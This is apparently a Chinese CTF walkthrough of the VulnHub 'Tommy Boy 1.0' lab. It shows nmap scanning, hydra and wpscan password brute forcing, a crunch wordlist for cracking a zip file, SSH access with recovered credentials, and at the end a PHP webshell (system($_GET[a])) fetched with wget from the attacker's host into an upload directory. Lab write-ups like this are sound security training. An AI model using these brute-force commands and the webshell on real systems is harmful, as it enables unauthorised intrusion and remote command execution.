vulnhub-TommyBoy1dot0

知识点

信息收集*

火狐插件修改user-agent为iphone

提权(更换低权限用户组)

Description

=================

圣施耐克！汤米男孩需要您的帮助！

Callahan Auto公司终于进入了现代技术领域，并建立了一个Web服务器供其客户用于订购刹车片。

不幸的是，该网站刚刚瘫痪，唯一拥有管理员凭据的人是Tom Callahan Sr.-刚刚去世！更糟糕的是，唯一一个了解服务器的人退出了！

您需要帮助Tom Jr.，Richard和Michelle再次恢复该网页。否则，卡拉汉汽车公司肯定会倒闭：-(

Objective

=================

主要目的是将主页的备份副本还原到Callahan Auto的服务器。但是，要考虑将箱子完全塞满，您将需要收集散布在系统上的5个标志，并使用其中的数据来解锁一条最终消息。

环境搭建

下载ova文件，导入虚拟机即可
下载地址：https://www.vulnhub.com/entry/tommy-boy-1,157/

———————-

信息收集

主机发现

1	nmap -sP 192.168.211.1/24

1592447825931

靶机ip为192.168.211.159

端口扫描

1	nmap -A 192.168.211.159 -p 1-65535

1592451324025

开放了22、80、8008三个端口
访问一下80端口
1592451394042

目录扫描

flag1

发现robots.txt，里面发现第一个flag的目录
1592451787319

之后返回首页查看网页源码，发现一个视频地址
1592463697415

1592463718365

看wp居然prehistoricforest/是个目录，长见识了
访问prehistoricforest，是一个博客系统

flag2

在最后一个posts中发现flag2
1592463981583

1592463999330

之后在另一篇博客中发现了一个目录
1592464604218

访问可以发现一张图片，下载下来使用编辑器查看可以发现一串md5
1592464686735

ce154b5a8e59c89732bc25d6a2e6b90b
解码的到spanky
1592464785947

这是一篇加密文章的密码，访问该加密文章
在文章中发现nickburns用户
1592465063411

根据说明，靶机开放了一个ftp端口，但是每隔15分钟都会关闭，通过nmap扫描得到ftp端口为65534
1592465776781

使用hydra爆破一下

1	hydra ftp://192.168.211.160:65534 -l nickburns -e ns

得到用户名和密码一样

1592466001305

使用ftp登陆，发现一个readme.txt文件，将其下到本地查看
1592466449357

1592466627906

提示将一个压缩包放到了NickIzL33t目录，但是访问却什么都没有发现，这是想起还有一个8008端口，访问
1592469708386

显示Steve Jobs可以查看内容，这是需要安装user-agent插件
1592470988271

访问成功，但是显示存在一个html隐藏文件，需要找到他
1592471290637

这里可以通过爆破来寻找该html文件，使用dirbuster工具
1592471489742

在这之前要设置user-agent为iphone
1592471734144

1592472233222

得到/fallon1.html,访问一下，发现第三个flag

flag3

1592472278055

还有一个hint
1592472395305

英语不好~~

1592472613453

再将第三个提示下载下来，是一个加密的压缩包，根据第一个提示进行爆破

* One uppercase character
* Two numbers
* Two lowercase characters
* One symbol
* The year Tommy Boy came out in theaters

使用crunch工具生成字典

-t 命令如下：

-t @,%^，指定模式，@,%^分别代表意义如下：

@ 插入小写字母

, 插入大写字母

% 插入数字

^ 插入特殊符号

1	crunch 13 13 -t bev,%%@@^1995 -o zippass.txt

1592490055107

之后使用工具爆破
1592490373628

密码为bevH00tr$1995，打开压缩包

Sandusky Banking Site
------------------------
Username: BigTommyC
Password: money

TheKnot.com (wedding site)
---------------------------
Username: TomC
Password: wedding

Callahan Auto Server
----------------------------
Username: bigtommysenior
Password: fatguyinalittlecoat

Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are.
However, I wrote myself a draft on the company blog with that information.

Callahan Company Blog
----------------------------
Username: bigtom(I think?)
Password: ??? 
Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.

提示密码fatguyinalittlecoat后面还有一些数字
之后扫描一下网站，发现为wordpress网站
使用wpscan进行利用
1592491780668

1	wpscan --url http://192.168.211.160/prehistoricforest/ -e u

1592491816554

根据压缩文件里面的信息，应该是要登陆tom这个用户，使用wpscan进行爆破

1	wpscan --url http://192.168.211.160/prehistoricforest -P /usr/share/wordlists/rockyou.txt -U tom

爆破得到密码为tomtom1
1592492618601

之后登陆后台，在posts里面发现密码后半部分
1592492729587

Username: bigtommysenior
Password: fatguyinalittlecoat1938!!

getshell

使用ssh连接之后getshell

1	ssh 192.168.211.160 -u bigtommysenior

flag4

登陆之后发现flag4
1592492929769

还有一个备份文件，将备份文件cp到index,html 里面

1	cp callahanbak.bak /var/www/html/index.html

网站能成功访问

1592493628244

之后便是提权

提权

根据flag4里面的提示，我们需要读取5.txt里面的内容，在根目录下发现了.5.txt文件，但是由于属于www-data用户组，所以并没有权限读取

1592536963450

之后发现
/var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/uploads目录，可以进行文件上传，里面后一个.htaccess文件，可以将gif文件当做PHP来执行

1592537081486

但是上传一个一句话木马并不能连接，所以尝试直接写入一句话

可以其将$_GET,$_POST和一些函数过滤了
1592537564970

这时可以考虑从攻击机上下载文件到该目录

开启一个http端口
python -m SimpleHTTPServer 8080

写一个一句话文件
<?php system($_GET[a]);?> #这里使用eval($_GET[a])没有成功

之后将其下载保存即可
1
>wget http://192.168.211.151:8080/shell.php -O shell.php